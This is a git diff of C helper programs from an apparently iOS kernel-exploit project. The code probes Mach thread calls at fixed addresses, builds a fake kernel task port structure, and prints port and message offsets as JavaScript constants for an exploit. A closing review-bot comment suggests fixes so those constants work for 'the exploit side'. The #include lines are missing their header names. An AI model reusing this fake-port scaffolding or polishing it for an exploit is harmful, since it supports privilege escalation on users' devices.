@@ -1,63 +1,63 @@ -#include -#include -#include - -int main(int argc, char* argv[]) { - kern_return_t kr; - thread_t th; - mach_port_name_t mytask, mythread; - arm_thread_state_t state; - mach_msg_type_number_t count; - printf("Hello, world!\n"); - mytask = mach_task_self(); - mythread = mach_thread_self(); - - printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); - mmap(0x1300000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0); - printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); - - *(uint32_t*)0x1301004 = 0x1300100; - *(uint32_t*)0x1301008 = 0x1300200; - *(uint32_t*)0x1301000 = 0x1300000; - - *(uint32_t*)0x1302000 = 0x1301000; - *(uint32_t*)0x1302004 = 0x1301004; - *(uint32_t*)0x1302008 = 0x1301008; - - *(uint32_t*)0x1304008 = 0x1303008; - *(uint32_t*)0x1305008 = 0x1304008; - - printf("%d(%x) %d(%x)\n", ARM_THREAD_STATE, ARM_THREAD_STATE, ARM_THREAD_STATE_COUNT, ARM_THREAD_STATE_COUNT); - - // 707 10580c 105848 1057c8 1057c4 41414141 105850 1 0 0 0 0 - printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); - - printf("still alive?\n"); - printf("%x\n", *(uint32_t*)0x1300000); - kr = thread_create(mytask, 0x1300000); - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - - printf("%x\n", *(uint32_t*)0x1300000); - printf("still alive?\n"); - kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1301008, 0x1301000); - - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - printf("still alive?\n"); - *(uint32_t*)0x1302008 = 0x41414141; - kr = thread_set_state(0x1300000, ARM_THREAD_STATE, 0x1305008, ARM_THREAD_STATE_COUNT); - - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1304008, 0x1301000); - - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - printf("%x\n", *(uint32_t*)0x1302008); - printf("still alive?\n"); - kr = 
thread_resume(0x1300000); - - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - printf("still alive?\n"); - - printf("still alive?\n"); - - return 0; +#include +#include +#include + +int main(int argc, char* argv[]) { + kern_return_t kr; + thread_t th; + mach_port_name_t mytask, mythread; + arm_thread_state_t state; + mach_msg_type_number_t count; + printf("Hello, world!\n"); + mytask = mach_task_self(); + mythread = mach_thread_self(); + + printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); + mmap(0x1300000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0); + printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); + + *(uint32_t*)0x1301004 = 0x1300100; + *(uint32_t*)0x1301008 = 0x1300200; + *(uint32_t*)0x1301000 = 0x1300000; + + *(uint32_t*)0x1302000 = 0x1301000; + *(uint32_t*)0x1302004 = 0x1301004; + *(uint32_t*)0x1302008 = 0x1301008; + + *(uint32_t*)0x1304008 = 0x1303008; + *(uint32_t*)0x1305008 = 0x1304008; + + printf("%d(%x) %d(%x)\n", ARM_THREAD_STATE, ARM_THREAD_STATE, ARM_THREAD_STATE_COUNT, ARM_THREAD_STATE_COUNT); + + // 707 10580c 105848 1057c8 1057c4 41414141 105850 1 0 0 0 0 + printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); + + printf("still alive?\n"); + printf("%x\n", *(uint32_t*)0x1300000); + kr = thread_create(mytask, 0x1300000); + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + + printf("%x\n", *(uint32_t*)0x1300000); + printf("still alive?\n"); + kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1301008, 0x1301000); + + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + printf("still alive?\n"); + *(uint32_t*)0x1302008 = 0x41414141; + kr = thread_set_state(0x1300000, ARM_THREAD_STATE, 0x1305008, ARM_THREAD_STATE_COUNT); + + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1304008, 0x1301000); 
+ + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + printf("%x\n", *(uint32_t*)0x1302008); + printf("still alive?\n"); + kr = thread_resume(0x1300000); + + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + printf("still alive?\n"); + + printf("still alive?\n"); + + return 0; } \ No newline at end of file diff --git a/tools/test.c b/tools/test.c old mode 100644 new mode 100755 diff --git a/tools/testlol.c b/tools/testlol.c old mode 100644 new mode 100755 index 5849b99..362b6fa --- a/tools/testlol.c +++ b/tools/testlol.c 
@@ -1,99 +1,101 @@
-#include
-#include
-#include
-//#include
-//#include
-
-typedef struct __attribute__((__packed__)) {
- uint32_t ip_bits;
- uint32_t ip_references;
- struct __attribute__((__packed__)) {
- uint32_t data;
- uint32_t pad;
- uint32_t type;
- } ip_lock;
- struct __attribute__((__packed__)) {
- struct __attribute__((__packed__)) {
- struct __attribute__((__packed__)) {
- uint32_t flags;
- uintptr_t waitq_interlock;
- uint64_t waitq_set_id;
- uint64_t waitq_prepost_id;
- struct __attribute__((__packed__)) {
- uintptr_t next;
- uintptr_t prev;
- } waitq_queue;
- } waitq;
- uintptr_t messages;
- natural_t seqno;
- natural_t receiver_name;
- uint16_t msgcount;
- uint16_t qlimit;
- } port;
- uintptr_t imq_klist;
- } ip_messages;
- natural_t ip_flags;
- uintptr_t ip_receiver;
- uintptr_t ip_kobject;
- uintptr_t ip_nsrequest;
- uintptr_t ip_pdrequest;
- uintptr_t ip_requests;
- uintptr_t ip_premsg;
- uint64_t ip_context;
- natural_t ip_mscount;
- natural_t ip_srights;
- natural_t ip_sorights;
-} kport_t;
-
-int main(int argc, char* argv[]) {
- printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
- printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
- printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO);
- printf("var MACH_PORT_LIMITS_INFO_COUNT = 0x%x;\n", MACH_PORT_LIMITS_INFO_COUNT);
- printf("var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x%x;\n", MACH_MSG_OOL_PORTS_DESCRIPTOR);
- printf("var kport_size = 0x%x;\n", sizeof(kport_t));
- kport_t kport[2] = {};
- uintptr_t *ptr = (uintptr_t*)(kport + 1);
- kport->ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
- kport->ip_references = 100;
- kport->ip_lock.type = 0x11;
- kport->ip_messages.port.qlimit = 777;
- kport->ip_receiver = 0x12345678; // dummy
- kport->ip_srights = 99;
- typedef struct {
- mach_msg_header_t Head;
- mach_msg_body_t msgh_body;
- mach_msg_ool_ports_descriptor_t init_port_set[0];
- } Request;
-
- printf("%x\n", sizeof(Request));
- printf("%x\n", sizeof(mach_msg_ool_ports_descriptor_t));
- printf("var req_init_port_set = 0x%x\n", offsetof(Request, init_port_set));
- printf("var req_init_port_set_address = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, address));
- printf("var req_init_port_set_count = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, count));
-// printf("var req_init_port_set_disposition = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, disposition));
-// printf("var req_init_port_set_deallocate = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, deallocate));
-// printf("var req_init_port_set_type = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, type));
- printf("var req_head_msgh_bits = 0x%x\n", offsetof(Request, Head.msgh_bits));
- printf("var req_head_msgh_request_port = 0x%x\n", offsetof(Request, Head.msgh_remote_port));
- printf("var req_head_msgh_reply_port = 0x%x\n", offsetof(Request, Head.msgh_local_port));
- printf("var req_head_msgh_id = 0x%x\n", offsetof(Request, Head.msgh_id));
- printf("var req_msgh_body_msgh_descriptor_count = 0x%x\n", offsetof(Request, msgh_body.msgh_descriptor_count));
-
- printf("%x\n", sizeof(mach_msg_header_t));
-
- printf("%x\n", MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE));
- printf("%x\n", MACH_SEND_MSG|MACH_MSG_OPTION_NONE);
- printf("%x\n", MACH_MSG_TIMEOUT_NONE);
-
- printf("var kport_ip_bits%x = 0x%x;\n", 4, offsetof(kport_t, ip_bits));
- printf("var kport_ip_references%x = 0x%x;\n", 4, offsetof(kport_t, ip_references));
- printf("var kport_ip_lock_type%x = 0x%x;\n", 4, offsetof(kport_t, ip_lock.type));
- printf("var kport_ip_messages_port_qlimit%x = 0x%x;\n", 2, offsetof(kport_t, ip_messages.port.qlimit));
- printf("var kport_ip_receiver%x = 0x%x;\n", 4, offsetof(kport_t, ip_receiver));
- printf("var kport_ip_srights%x = 0x%x;\n", 4, offsetof(kport_t, ip_srights));
- printf("var MIG_MAX = 0x%x\n", 0x1000);
- printf("var NDR_record = %x %x %x %x\n", NDR_record);
-
- return 0;
+#include
+#include
+#include
+#include
+//#include
+//#include
+
+typedef struct __attribute__((__packed__)) {
+ uint32_t ip_bits;
+ uint32_t ip_references;
+ struct __attribute__((__packed__)) {
+ uint32_t data;
+ uint32_t pad;
+ uint32_t type;
+ } ip_lock;
+ struct __attribute__((__packed__)) {
+ struct __attribute__((__packed__)) {
+ struct __attribute__((__packed__)) {
+ uint32_t flags;
+ uintptr_t waitq_interlock;
+ uint64_t waitq_set_id;
+ uint64_t waitq_prepost_id;
+ struct __attribute__((__packed__)) {
+ uintptr_t next;
+ uintptr_t prev;
+ } waitq_queue;
+ } waitq;
+ uintptr_t messages;
+ natural_t seqno;
+ natural_t receiver_name;
+ uint16_t msgcount;
+ uint16_t qlimit;
+ } port;
+ uintptr_t imq_klist;
+ } ip_messages;
+ natural_t ip_flags;
+ uintptr_t ip_receiver;
+ uintptr_t ip_kobject;
+ uintptr_t ip_nsrequest;
+ uintptr_t ip_pdrequest;
+ uintptr_t ip_requests;
+ uintptr_t ip_premsg;
+ uint64_t ip_context;
+ natural_t ip_mscount;
+ natural_t ip_srights;
+ natural_t ip_sorights;
+} kport_t;
+
+int main(int argc, char* argv[]) {
+ printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
+ printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
+ printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO);
+ printf("var MACH_PORT_LIMITS_INFO_COUNT = 0x%x;\n", MACH_PORT_LIMITS_INFO_COUNT);
+ printf("var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x%x;\n", MACH_MSG_OOL_PORTS_DESCRIPTOR);
+ printf("var kport_size = 0x%x;\n", sizeof(kport_t));
+ kport_t kport[2] = {};
+ uintptr_t *ptr = (uintptr_t*)(kport + 1);
+ kport->ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
+ kport->ip_references = 100;
+ kport->ip_lock.type = 0x11;
+ kport->ip_messages.port.qlimit = 777;
+ kport->ip_receiver = 0x12345678; // dummy
+ kport->ip_srights = 99;
+ typedef struct {
+ mach_msg_header_t Head;
+ mach_msg_body_t msgh_body;
+ mach_msg_ool_ports_descriptor_t init_port_set[0];
+ } Request;
+
+ printf("%x\n", sizeof(Request));
+ printf("%x\n", sizeof(mach_msg_ool_ports_descriptor_t));
+ printf("var req_init_port_set = 0x%x\n", offsetof(Request, init_port_set));
+ printf("var req_init_port_set_address = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, address));
+ printf("var req_init_port_set_count = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, count));
+ printf("%x %x %x %x %x\n", PROT_READ, PROT_WRITE, PROT_EXEC, MAP_PRIVATE, MAP_ANON);
+// printf("var req_init_port_set_disposition = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, disposition));
+// printf("var req_init_port_set_deallocate = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, deallocate));
+// printf("var req_init_port_set_type = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, type));
+ printf("var req_head_msgh_bits = 0x%x\n", offsetof(Request, Head.msgh_bits));
+ printf("var req_head_msgh_request_port = 0x%x\n", offsetof(Request, Head.msgh_remote_port));
+ printf("var req_head_msgh_reply_port = 0x%x\n", offsetof(Request, Head.msgh_local_port));
+ printf("var req_head_msgh_id = 0x%x\n", offsetof(Request, Head.msgh_id));
+ printf("var req_msgh_body_msgh_descriptor_count = 0x%x\n", offsetof(Request, msgh_body.msgh_descriptor_count));
+
+ printf("%x\n", sizeof(mach_msg_header_t));
+
+ printf("%x\n", MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE));
+ printf("%x\n", MACH_SEND_MSG|MACH_MSG_OPTION_NONE);
+ printf("%x\n", MACH_MSG_TIMEOUT_NONE);
+
+ printf("var kport_ip_bits%x = 0x%x;\n", 4, offsetof(kport_t, ip_bits));
+ printf("var kport_ip_references%x = 0x%x;\n", 4, offsetof(kport_t, ip_references));
+ printf("var kport_ip_lock_type%x = 0x%x;\n", 4, offsetof(kport_t, ip_lock.type));
+ printf("var kport_ip_messages_port_qlimit%x = 0x%x;\n", 2, offsetof(kport_t, ip_messages.port.qlimit));
+ printf("var kport_ip_receiver%x = 0x%x;\n", 4, offsetof(kport_t, ip_receiver));
+ printf("var kport_ip_srights%x = 0x%x;\n", 4, offsetof(kport_t, ip_srights));
+ printf("var MIG_MAX = 0x%x\n", 0x1000);
+ printf("var NDR_record = %x %x %x %x\n", NDR_record);
+
+ return 0;
 }
\ No newline at end of file
diff --git a/tools/thread_shit.c b/tools/thread_shit.c
old mode 100644
new mode 100755
-- cgit v1.2.3
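Review bot: `printf("var NDR_record = %x %x %x %x\n", NDR_record);` near the end of main on the new side passes a single struct-typed argument (presumably the `NDR_record_t` global from mach/ndr.h) to four `%x` conversions, which is undefined behaviour, so the generated JS constant is whatever sat in the argument registers rather than the record bytes the consumer presumably wants to reproduce. Emit the record bytewise instead, e.g. `const unsigned char *nb = (const unsigned char *)&NDR_record;` then `for (size_t i = 0; i < sizeof NDR_record; i++) printf("%02x", nb[i]);` followed by `printf("\n");`. Every `sizeof`/`offsetof` value in the hunk is also printed through `0x%x`, which expects `unsigned int` while those expressions are `size_t`; `0x%zx` is the matching conversion and removes the reliance on the arm64 varargs convention for the kport and message-layout constants the exploit side depends on. The newly added `printf("%x %x %x %x %x\n", PROT_READ, PROT_WRITE, PROT_EXEC, MAP_PRIVATE, MAP_ANON);` prints bare numbers without the `var NAME = 0x...;` form used by every other generated line, so the JS that includes this output cannot consume it; either name them (`var PROT_READ = 0x%x;` etc.) or drop the line.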